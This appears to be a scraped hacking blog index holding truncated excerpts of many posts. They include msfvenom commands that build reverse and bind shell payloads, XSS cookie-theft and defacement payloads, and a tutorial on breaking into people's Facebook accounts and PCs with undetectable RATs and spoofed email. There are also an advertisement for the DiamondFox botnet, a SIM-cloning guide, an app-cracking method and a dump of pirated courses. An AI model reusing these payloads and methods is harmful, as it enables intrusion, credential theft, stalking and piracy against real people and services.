Skip to main content

Posts

Showing posts with the label Hacked

WAYS FACEBOOK ACCOUNT CAN BE HACKED (repost)

WAYS FACEBOOK ACCOUNT CAN BE HACKED (repost) 1= Social engineering 2= Phishing 3= Keylogging 4= Bypass security questions 5= Password Stealers 6= Brute force attack 7= Session Hijacking 8= DNS spoofing 9= Side jacking 10= Mobile phone hacking 11= Click jacking 12= Man in the middle attack 13= USB Theft 14= Cookies Grabbing 15= Botnet 16= Likes jacking 17= Dictionary attack 18= Exploiting Facebooks Three Trusted friend feature NOTE : this is not going to be explained, interested peeps should read about it. Thanks 😊

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell*

HAX [powered by P2R]: *How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell* When I left off on our last hack, we had hacked into the ubiquitous Windows Server 2003 server by adding ourselves as a user to that system so that we can return undetected at any time. The problem with this approach is that a sysadmin who is on their toes will note that a new user has been added and will begin to take preventative action. I will duly note that in small organizations with a sysadmin who wears multiple hats, the chances of this happening is small in the near term, but certainly when they get around to reviewing their logs, will notice a new user—maybe. Fortunately for us, many of the sysadmins never get around to reviewing their log files until it's too late. In this new hack, we will attempt to put a command prompt on the Server 2003 that will allow us execute command remotely on the system. Remember in our previous hack when we added ourselves as a user? I

Some Private Notes on Bug Hunting

Some Private Notes on Bug Hunting Aashish Kunvar Anon haxo: ########By dorkerdevil ##############                 Hope you like it #NavinYadav bro for u n for group                                                                                                                                                                                            Hack Notes echo -e "HEAD /HTTP/1.0\n\n" | nc -vv website.com echo -e "HEAD /HTTP/1.0\n\n" | openssl s_client -quit -connect website:443 nikto -p 80 -h website -verbose whisker2.1 -p 80 -h website enum all extensions: .asp,.aspx,.css,.htc,.htr,.htw,.ida,.idc,.idq,.printer,.shtm,.xml,.xsl previous version of pages:~ extensions: .bak,.old,.orig,.txt search for common directories such as:~ /bak,/inc,/old,/script SQL connection strings:~ db= dbconn= ~:xss payloads to check:~ <script>alert(document.cookie)</script> 1.attempt different embedding method: %3cscript%3e, %253cscript%253e, %00%3cscript%

Bug bounty forum

Streaak: Bug bounty forum https://bugbountyforum.com/blog/ama/nahamsec / https://bugbountyforum.com/blog/ama/yaworsk / https://bugbountyforum.com/blog/ama/jstnkndy / https://bugbountyforum.com/blog/ama/itsecurityguard / https://bugbountyforum.com/blog/ama/avlidienbrunn / @irPentesters

[Tutorial] How to deface website with Cross Site Scripting [Noobs]

JuanDeLemos: [Tutorial] How to deface website with Cross Site Scripting [Noobs]  Today i am gonna teach you how to deface the sites which has the XSS vulnerability . IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only. Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website to Hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..! i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one . 1 - Script for changing the background Color of a website: <script>document.body.bgColor="red";</script> use this in your target website as http://www.targetwebsite.com /<script>document.body.bgColor="red";</script> 2 - Script for chaning the background image of a website: <script>document.body.background=&q

Listing payloads

Listing payloads msfvenom -l Windows Paylaods Reverse Shell : msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe Bind Shell: msfvenom -p windows/meterpreter/bind_tcp RHOST= (IP Address) LPORT=(Your Port) -f exe > bind.exe Create User: msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe CMD shell: msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe Encoder: msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe One can also use the -a to specify the architecture or the --platform Linux Payloads Reverse Shell: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >reverse.elf Bind Shell: msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf Generic Shell: msfvenom -p generic/shell_bind_tcp RHOST=(IP Address) LPORT=(

Lots Of Hacking Courses

/\ / \ _ __ ___ _ __ _ _ _ __ ___ _ good one__ _ _ ___ / /\ \ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __| / ____ \| | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \ /_/ \_\_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/ __/ | |___/ Courses pirated & dumped by Case & S1rlancelot irc.anonops.com/6697 #learninghub * This series of videocourses will guide you through the core material that an entry-level "ethical" hacker needs. * Go to pluralsight.com (most links here are from there) and search the course if you want to see the table of contents. * You may want to use a media player that allows you to increase the speed of the videos * The number does not mean the order in which you should follow the courses, its just the order in which they were added. * Use ?desc <coursenumber> to check the description of a course. Eg: ?desc 81 * Special thanks to ClaudiaD who haxed her way and made downloading the videos a lot easier, you rock. I also r

Some Hacking Links

How to Hack an Ethernet ADSL Router http://bit.ly/2sgAps2 How to Hack Yahoo Messenger http://bit.ly/2sgKJAm How to Create Your Own Customized Run Commands http://bit.ly/2rGyXjU What is Denial of Service (DoS) Attack? http://bit.ly/2sIybD5 How to Hack Passwords Using a USB Drive http://bit.ly/2rGfrUX How to Hack Snapchat Account http://bit.ly/2rLAcJS Hacking Someone's Facebook Password Using Some Software Or Website? No Sir You Can't! http://bit.ly/2sgv6sI Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability http://bit.ly/2tie1gx List of Best sites to learn Malware Analysis http://bit.ly/2tigZBm Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking_ http://bit.ly/2thYoFz List of Best Ethical Hacking / Penetration Testing Tools http://bit.ly/2rLIDoz Web Application Hacking - List Of Vulnerable Web Applicationsa http://bit.ly/2rLu6JB Phonty Review: Cell Phone Tracker With Best Features http://bit.ly/2sgIOf3 How

Hack Everything(Latest)

Anon Av: TUTORIAL: Hack anyone Facebook,email or PC.. This tutorial is like a spreading tutorial way basically. But more precise and powerful. MOSTLY I HAVE HACKED GIRLS WITH THIS METHOD (because they don't get fooled so easily by a poser and other shit. So this thing can do it) REQUIREMENTS:- 1) A fully FUD server(SERVER BEING FUD is the most important part of the hack) 2) Patience That's all... Now coming to the hack... there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting... so read one and make your server fully fud... Now do just as what i say:- 1) go to " http://emailattack.host22.com/emailspoof.php " and leave that tab open 2) now login to your facebook and copy the username of the person(FB username) you want to hack like this.... http://imageshack.us/photo/my-images/543/username.png so basically the name after the http://www.facebook.com / is the username... in my example "RANDOM" is the username..

List of Hacking Websites and Forums:

Anon Av: List of Hacking Websites and Forums: Cybrary – Free Cyber Security Training URL:  http://www.cybrary.it Hak5 – New Hacks Every Week URL: https://hak5.orgTinkernut  URL:  http://www.tinkernut.com Cyberpunk URL:  http://n0where.net Exploit Database URL:  http://www.exploit-db.com Darknet URL:  http://www.darknet.org.uk HackADay – Fresh hack everyday URL:  http://hackaday.com Evil Zone – Hacking Community URL:  https://evilzone.org Hack this Site URL:  https://www.hackthissite.org Cellphone Hacks Forum URL: http://www.cellphonehacks.comHack Society – Grey Hat Hacking Forrum URL:  http://hacksociety.net HackForums – Hacks & Exploits URL:  http://www.hackforums.net SecuriTeam – Vulnerabilities information URL:  http://www.securiteam.com

Method For HMA(Free by Hacked)

Anon Av: PROGRAMMERdone THOD HMA Method hma pro 12 month 1- Download Lucky patcher from here : . http://lucky-patcher.ar.uptodown.com/android 2- Download Hma pro in android from Google play 2- Open Lucky patcher 3- click on the hma pro app then click Open menu of patches then create a modified apk file 4- click on the third option(apk rebuild for InApp &LVL) then click rebuild app 5-it will show please wait as it is building. Wait till it finishes. Don't touch phone screen or it will go 6- after it finishes ull see some success n error (don't worry it's all part) click go to file and click the apk select uninstall and install app 8- just wait when it finished install and go open the hma pro app 9- go sign up but first use temp mail (like mail.com getnada.com etc and get one account 10- sign up with it and close the app and open it again .. 11- when u open ull see two forms of payment, click Google play store (prices should be in decimals) click on 12 m

Setup Diamond Botnet

‌JuanDeLemos: /$$$$$$$$            /$$$$$$        /$$              /$$   | $$_____/           /$$$_  $$      | $$            /$$$$$$ | $$       /$$   /$$| $$$$\ $$  /$$$$$$$ /$$   /$$ /$$__  $$ | $$$$$   |  $$ /$$/| $$ $$ $$ /$$__  $$| $$  | $$| $$  \__/ | $$__/    \  $$$$/ | $$\ $$$$| $$  | $$| $$  | $$|  $$$$$$ | $$        >$$  $$ | $$ \ $$$| $$  | $$| $$  | $$ \____  $$ | $$$$$$$$ /$$/\  $$|  $$$$$$/|  $$$$$$$|  $$$$$$/ /$$  \ $$ |________/|__/  \__/ \______/  \_______/ \______/ |  $$$$$$/                                                    \_  $$_/                                                      \__/ DiamondFox Bot Download: for contact free +639380509517 Loader:     Core totally recoded.     Stability improved.     size Improved (18kb with configurations).     No dependencies.     Full windows compatibility (x86 and x64 from XP to Windows 10).     New cryptographic methods.     New installation routines (Bypass AVs proactives).     Domain generation a

How to Clone any simcard

How to Clone/Hack Any Simcard Originally Published on June 2017, and updating so far. Today. Before we go further, I would like to make one thing clear SIM Card Cloning is illegal. This tutorial should be used for educational purposes only. After this, you can be able to Clone SIM Card easily but don’t harm others. Mobile Phone is everybody’s need, people mostly do their confidential talks over cell phones, But only some of them know how easy it is to eavesdrop them, there are some tricks and hacks to do that, but the most powerful way is to clone their SIM Card. The Subscriber Identity Module aka SIM Card is the transmitter of the signal to the mobile and tower. The Subscriber Identity Module aka SIM Card is the transmitter of the signal to the mobile and tower. Our SIM cards contain two secret codes or keys called (IMSI value and KI value) which enables the operator to know the mobile number and authenticate the customer, these codes are related to our mobile numbers which the o